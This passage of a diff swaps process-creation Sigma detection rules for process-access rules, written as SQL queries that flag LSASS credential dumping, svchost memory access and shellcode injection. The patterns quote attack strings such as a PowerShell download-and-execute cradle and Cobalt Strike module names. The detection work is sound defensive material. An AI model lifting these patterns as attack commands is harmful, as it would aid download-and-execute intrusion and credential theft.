AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" ], - "filename": "proc_creation_win_tscon_localsystem.yml" + "filename": "proc_access_win_susp_proc_access_lsass.yml" }, { - "title": "DLL Execution Via Register-cimprovider.exe", - "id": "a2910908-e86f-4687-aeba-76a5f996e652", - "status": "test", - "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", - "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", + "title": "Potential Svchost Memory Access", + "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "status": "experimental", + "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "author": "Tim Burrell", "tags": [ "attack.defense_evasion", - "attack.t1574" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM 
logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\register-cimprovider.exe' ESCAPE '\\' AND CommandLine LIKE '%-path%' ESCAPE '\\' AND CommandLine LIKE '%dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_registry_cimprovider_dll_load.yml" + "filename": "proc_access_win_invoke_phantom.yml" }, { - "title": "Download Arbitrary Files Via MSOHTMED.EXE", - "id": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", "status": "experimental", - "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Samir Bousseaden, Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "False positives are present when looking for 0x1410. Exclusions may be required." 
], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSOHTMED.exe' ESCAPE '\\' OR OriginalFileName = 'MsoHtmEd.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msohtmed_download.yml" + "filename": "proc_access_win_lsass_memdump.yml" }, { - "title": "Operator Bloopers Cobalt Strike Modules", - "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", - "status": "experimental", - "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "CMSTP Execution Process Access", + "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ + "attack.defense_evasion", + "attack.t1218.003", "attack.execution", - "attack.t1059.003" + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' 
AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE CallTrace LIKE '%cmlua.dll%' ESCAPE '\\'" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" + "filename": "proc_access_win_cmstp_execution_by_access.yml" }, { - "title": "Renamed Plink Execution", - "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", - "status": "experimental", - "description": "Detects the execution of a renamed version of the Plink binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "SVCHOST Credential Dump", + "id": "174afcfa-6e40-4ae9-af64-496546389294", + "status": "test", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "author": "Florent Labouyrie", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Non identified legit exectubale" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_plink.yml" + "filename": 
"proc_access_win_svchost_cred_dump.yml" }, { - "title": "Suspicious PowerShell Download and Execute Pattern", - "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", - "status": "experimental", - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", - "author": "Florian Roth (Nextron Systems)", + "title": "Credential Dumping by LaZagne", + "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "status": "stable", + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ], "falsepositives": [ - "Software installers that pull packages from remote systems and execute them" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_powershell_susp_download_patterns.yml" + 
"filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" }, { - "title": "Potential CVE-2021-41379 Exploitation Attempt", - "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "status": "test", - "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Shellcode Injection", + "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "status": "experimental", + "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", + "author": "Bhabesh Raj", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1068" + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" + "SELECT * FROM logs WHERE ((GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files 
(x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_41379.yml" + "filename": "proc_access_win_shellcode_inject_msf_empire.yml" }, { - "title": "Suspicious Driver Install by pnputil.exe", - "id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", - "status": "test", - "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", - "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", + "title": "LSASS Access from Program in Suspicious Folder", + "id": 
"fa34b441-961a-42fa-a100-ecc28c886725", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Pnputil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + "Updaters and installers are typical false positives. Apply custom filters depending on your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/install%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/add-driver%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\pnputil.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE 
'%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND 
GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Roaming\\\\ViberPC\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\updater.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\') AND SourceImage LIKE '%\\\\AdobeARMHelper.exe' ESCAPE '\\' AND GrantedAccess = '0x1410')))" ], - "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" }, { - "title": "Wscript Shell Run In CommandLine", - "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "title": "Credential Dumping Tools Accessing LSASS Memory", + "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "status": "experimental", - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects processes requesting access to 
LSASS memory via suspicious access masks. This is typical for credentials dumping tools", + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" ], "falsepositives": [ - "Rare legitimate inline scripting by some administrators" + "Likely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE 
'\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 
'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_script_wscript_shell_cli.yml" + "filename": "proc_access_win_cred_dump_lsass_access.yml" }, { - "title": "Use Of The SFTP.EXE Binary As A LOLBIN", - "id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", - "status": "experimental", - "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WerFault Accassing LSASS", + "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "status": "test", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - 
